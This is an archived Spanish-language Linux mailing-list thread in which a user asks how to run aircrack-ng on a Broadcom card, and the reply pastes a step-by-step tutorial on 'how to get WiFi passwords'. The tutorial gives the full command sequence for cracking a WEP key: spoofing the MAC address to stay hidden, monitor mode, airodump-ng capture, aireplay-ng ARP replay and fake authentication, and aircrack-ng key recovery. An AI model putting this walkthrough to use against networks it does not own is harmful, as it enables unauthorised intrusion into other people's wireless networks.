[U-co] Aircrack ubuntu 9

[JORGE ERNESTO GOMEZ GIRALDO]

El 6 de agosto de 2009 14:01, Alain Rios <debianista08 en gmail.com> escribió:

> Buena  a todos,
>
>
> Una preguntica alguien sabe o ha hecho funcionar aircrack con esta tarjeta
> Broadcom Corporation BCM4311 802.11b/g WLAN (rev 02) es de un compaq c700
> es que voy a consola con este comando : airmon-ng start eth1
>
> Interface    Chipset        Driver
>
> eth1        Unknown         wl (monitor mode enabled)
>
> Creo yo que esta en modo monitor, y le doy este comando: airodump-ng mon0
>
> Interface mon0:
> ioctl(SIOCGIFINDEX) failed: No such device
>
> Alguien sabe como hacerlo funcionar...
>
>
> Gracias por su colaboracion..
>
> --
> Alain Rios C.
> Linux User #413670
> http://golukx.blogspot.com
> Colombia-Cucuta
> --
> Al escribir recuerde observar la etiqueta (normas) de esta lista:
> http://ur1.ca/0uf7
> Para cambiar su inscripción, vaya a "Cambio de opciones" en
> http://ur1.ca/0uf9
>


El día de hoy, vamos a ver *como* sacar *contraseñas* *WiFi*, en *este* caso
*una* contraseña con encriptación WEP.

   - Lo primero que debemos hacer es descargar Backtrack 3. Descagar
Aquí<http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-cd>
   - Luego grabamos la imagen en un CD, para esto podemos utilizar un
   programa gratuito como ISO recorder 2.0. Descargar Aquí
    <http://iso-recorder.softonic.com/>
   - Una vez con el cd grabado, reiniciamos el computador y ponemos el cd
   para que arranque BackTrack 3.
   - Luego abrimos una consola (shell) con el icono que está al lado de la
   “K” de la esquina inferior izquierda.
   - Detenemos *nuestra* tarjeta de Red (En este caso una Atheros por lo
   tanto es ath0)
   Escribimos: airmon-ng stop ath0

   - Para continuar, cambiamos nuestra MAC (*Media Access* Control), para
   ser “ocultados”.

   Escribimos: macchanger -m 11:22:33:44:55:66 wifi0
   - Iniciamos nuestra tarjeta de Red en modo Monitor.
   Escribimos: airmon-ng start wifi0

   - Ahora nos aseguraremos que todo vaya bien, revisaremos *la
MAC*cambiada y que la tarjeta esté en modo Monitor.
   Escribimos: iwconfig

   - Ahora, a revisar si hay redes cerca nuestro.

   Escribimos: airodump-ng wifi0
   - Anotemos datos muy importantes de la pantalla anterior, como lo son:
      - La MAC *de la red* (BSSID)
      - El canal por donde se transmite la red WiFi (CH)
      - El nombre de la red (ESSID)
   - Presionamos CTRL+C y así se detendrá la búsqueda de redes cercanas.
   Luego escribimos:* airodump-ng –channel X –write XXX ath0*
   x= Canal (CH)
   xxx= Nombre para guardar el archivo con información, pongan cualquier
   nombre, en este caso “pass”
   Para este ejemplo sería: airodump-ng –channel 5 –write pass ath0

   - Ahora abrimos otra ventana de consola (Shell).
   Escribimos lo siguiente: aireplay-ng -3 -b (mac de la red) -h (nuestra
   mac) ath0

   - Volvemos a abrir otra ventana de consola (Shell)
   Ahora escribimos: aireplay-ng -1 0 -e (ESSID) -a (BSSID) -h (nuestra mac)
   ath0

   - Ahora debemos esperar a que se obtenga la información suficiente como
   para saber la contraseña de la red, para esto tenemos que esperar a que los
   ARP sean altos (más de 50.000).
   - Una vez que tengamos suficiente información (lo sabrás con experiencia,
   muchos intentos, todo depende de la dificultad de la contraseña), cancelamos
   lo que teníamos andando presionando CTRL+C en cada *consola* (Shell).
   - Luego iniciamos otro programa para que desencripte la contraseña.
   Escribimos: Aircrack-ng pass-01.cap


Finalmente, ya tenemos la contraseña de la red. BackTrack 3 ha funcionado.

Buen tema.

-- 
JORGE ERNESTO GOMEZ GIRALDO
3102120777
UC